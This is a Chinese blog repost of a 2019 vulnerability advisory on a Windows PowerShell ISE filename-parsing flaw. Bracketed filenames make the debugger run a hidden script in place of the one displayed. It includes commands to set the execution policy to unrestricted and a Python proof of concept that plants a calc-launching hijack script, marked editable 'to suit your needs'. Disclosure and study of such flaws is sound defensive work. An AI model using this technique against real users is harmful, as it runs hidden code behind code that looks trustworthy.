PowerShell ISE/文件名解析缺陷远程执行代码漏洞#RCE

https://vulners.com/zdt/1337DAY-ID-32642

基础信息

  • ID 1337DAY-ID- 32642
  • 类型 zdt
  • Reporter hyp3rlinx
  • 修改后的 2019-05-03 00:00:00

描述

在调试包含数组括号作为文件名一部分的特制PowerShell脚本时,Microsoft Windows PowerShell ISE将执行错误提供的代码。这可能导致ISE执行由文件名指向的攻击者提供的脚本,而不是当前加载主机应用程序中用户查看的“可信”PS文件。这破坏了PowerShell ISE的完整性,允许潜在的意外远程代码执行。

Windows PowerShell ISE / Filename Parsing Flaw Remote Code Execution Exploit

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt 

[Vendor]
www.microsoft.com

[Product]
Windows PowerShell ISE

The Windows PowerShell Integrated Scripting Environment (ISE) is a host application for Windows PowerShell.
In the ISE, you can run commands and write, test, and debug scripts in a single Windows-based graphic user interface.

[Vulnerability Type]
Filename Parsing Flaw Remote Code Execution 0day

[References]
ZDI-CAN-8005

[Security Issue]
Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain
array brackets as part of the filename. This can result in ISE executing attacker supplied scripts pointed to by the filename
and not the "trusted" PS file currently loaded and being viewed by a user in the host application. This undermines the integrity of
PowerShell ISE allowing potential unexpected remote code execution.

In PowerShell brackets are used to access array elements.

PS C:\> $a=1..10
PS C:\> $a[4]
5

However, when brackets are used as part of the filename it can be used to hijack the currently loaded file in place of another malicious file.
That file must contain a single matching char value which is also found in our specially crafted filename.

Requirements are both files must reside in the same directory. Example, if a file named [HelloWorldTutoria1].ps1 resides alongside a
file named 1.ps1 it will create a script hijacking condition. Note, the last letter is a number "1" not a lowercase "L".

Other things I discovered playing with PS filenames is we can target scripts using a single alphabetic or numeric char and certain symbols.
PowerShell scripts with only a single quote also work, [Pwned'].ps1 will load and execute ===> '.ps1 if debugged from the vuln ISE application.

These chars also get the job done:
"$" "_" "#" "^"  plus any single case insensitive letter a-z or numbers 0-9, [Hello_World].ps1 ====> _.ps1

[Hello].ps1 will execute this instead =====> h.ps1

Dashes "-" throw the following error: "The specified wildcard character pattern is not valid: [Hello-World].ps1" when pointing to
another PS file named -.ps1 and seems to treat it sort of like a meta-character.

[pw3d].ps1 <===== expected to execute

3.ps1 <===== actually executed

This exploits the trust between PowerShell ISE and the end user. So scripts debugged local or over a network share display "trusted" code
in ISE that is expected to run. However, when the user debugs the script a different script gets executed.
Interestingly, that second script does NOT get loaded into PowerShell ISE upon execution, so a user may not see anything amiss.

User interaction is required for a successful attack to occur and obviously running any unknown PowerShell script can be dangerous.
Again, this exploit takes advantage of "trust" where users can see and read the code and will trust it as everything looks just fine and
yet ... still they get PWNED!.

Tested successfully on Win7/10

Long live user interaction! lol...

[POC Video URL]
https://www.youtube.com/watch?v=T2I_-iUPaFw

[Exploit/POC]
After opening PS files in ISE, set the execution policy so can test without issues.
set-executionpolicy unrestricted -force

PS scripts over Network shares may get 'RemoteSigned' security policy issue so run below cmd.

set-executionpolicy unrestricted -force process
Choose 'R' to run once.

Below Python script will create two .ps1 files to demonstrate the vulnerable condition.
Examine the code, what does it say? it reads... Write-output "Hello World!"... now Run it...

BAM! other PS script executes!.

#PowerShell ISE 0day Xploit
#ZDI-CAN-8005
#ZDI CVSS: 7.0
#hyp3rlinx
#ApparitionSec

fname1="[HelloWorldTutoria1].ps1"    #Expected code to run is 'HelloWorld!'
fname2="1.ps1"                       #Actual code executed is calc.exe for Poc
evil_code="start calc.exe"           #Edit to suit your needs.
c=0
payload1='Write-Output "Hello World!"'
payload2=evil_code+"\n"+'Write-Output "Hello World!"'

def mk_ps_hijack_script():
    global c
    c+=1
    f=open(globals()["fname"+str(c)],"wb")
    f.write(globals()["payload"+str(c)])
    f.close()
    if c<2:
        mk_ps_hijack_script()

if __name__=="__main__":
    mk_ps_hijack_script()
    print "PowerShell ISE Xploit 0day Files Created!"
    print "Discovery by hyp3rlinx"
    print "ZDI-CAN-8005"

#  0day.today [2019-05-03]  #

原文地址:https://www.cnblogs.com/17bdw/p/10812300.html

时间: 2024-11-10 14:51:32

PowerShell ISE/文件名解析缺陷远程执行代码漏洞#RCE的相关文章

安全狗:HTTP.SYS远程执行代码漏洞分析 (MS15-034 )

[作者:安全狗安全研究团队] 写在前言: 在2015年4月安全补丁日,微软发布了11项安全更新,共修复了包括Microsoft Windows.Internet Explorer.Office..NET Framework.Server软件.Office Services和Web Apps中存在的26个安全漏洞.其中就修复了HTTP.sys 中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 ).目前服务器安全狗已经更新了安全补丁,建议及时修复安全狗提示给您的漏洞信

CVE-2013-1347Microsoft Internet Explorer 8 远程执行代码漏洞

[CNNVD]Microsoft Internet Explorer 8 远程执行代码漏洞(CNNVD-201305-092) Microsoft Internet Explorer是美国微软(Microsoft)公司发布的Windows操作系统中默认捆绑的Web浏览器.         Internet Explorer 访问尚未正确初始化或已被删除的对象的方式中存在一个远程执行代码漏洞,该漏洞可能以一种攻击者可以在当前用户的上下文中执行任意代码的方式损坏内存.攻 击者可能拥有一个特制的网站,

Microsoft Windows 远程桌面服务远程执行代码漏洞(CVE-2019-0708)

Windows是一款由美国微软公司开发的窗口化操作系统. 当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞.此漏洞是预身份验证,无需用户交互. <*来源:Microsoft 链接:https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2019-0708 *> 解决办法 厂商补丁: Microsoft --------- M

Microsoft .NET Framework 远程执行代码漏洞

受影响系统:Microsoft .NET Framework 4.8Microsoft .NET Framework 4.7.2Microsoft .NET Framework 4.7.1Microsoft .NET Framework 4.7Microsoft .NET Framework 4.6.2Microsoft .NET Framework 4.6.1Microsoft .NET Framework 4.6Microsoft .NET Framework 4.5.2Microsoft

HTTP.SYS远程执行代码漏洞分析

社区:i春秋 时间:2016年8月10日 作者:MAX丶 大家肯定用过bugscan老板裤子里面经常出现这个漏洞提示. [xxx存在http.sys远程漏洞]今天我们来分析分析这漏洞如何存在的, 据称,利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃. 根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7.Windows Server 2008 R2.Windows 8.Windo

中国寒龙出品-Windows IE浏览器OLE自动化阵远程执行代码漏洞

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/powershell' class Metasploit4 < Msf::Exploit::Remote Rank = Excellen

Linux下Bash 远程执行代码漏洞,重要赶紧修复

CVE-2014-6271: remote code execution through bash漏洞具体介绍地址:http://seclists.org/oss-sec/2014/q3/650可以执行: env t='() { :;}; echo You are vulnerable.' bash -c "true" 进行测试,如提示You are vulnerable. 那就存在漏洞,就需要修补.系统为cent os ,该漏洞修复方法:  yum update bash -y 系统

HTTP.sys 远程执行代码验证工具

漏洞信息: 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞.这里将测试工具改成windows版本方便工作. 代码: /* UNTESTED - MS15-034 Checker THE BUG: 8a8b2112 56 push esi 8a8b2113 6a00 push 0 8a8b2115 2bc7 sub eax,edi 8a8b2117 6a01 push 1 8a8b2119 1bca

齐博cms最新SQL注入网站漏洞 可远程执行代码提权

齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢.开发架构使用的是php语言以及mysql数据库,强大的网站并发能力.于近日,我们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何利用. 在对整个网站代码的漏洞检测中发现do目录下的activate.php存在可以插入恶意参数的变量值,我们来看下这个代码: 齐博cms漏洞详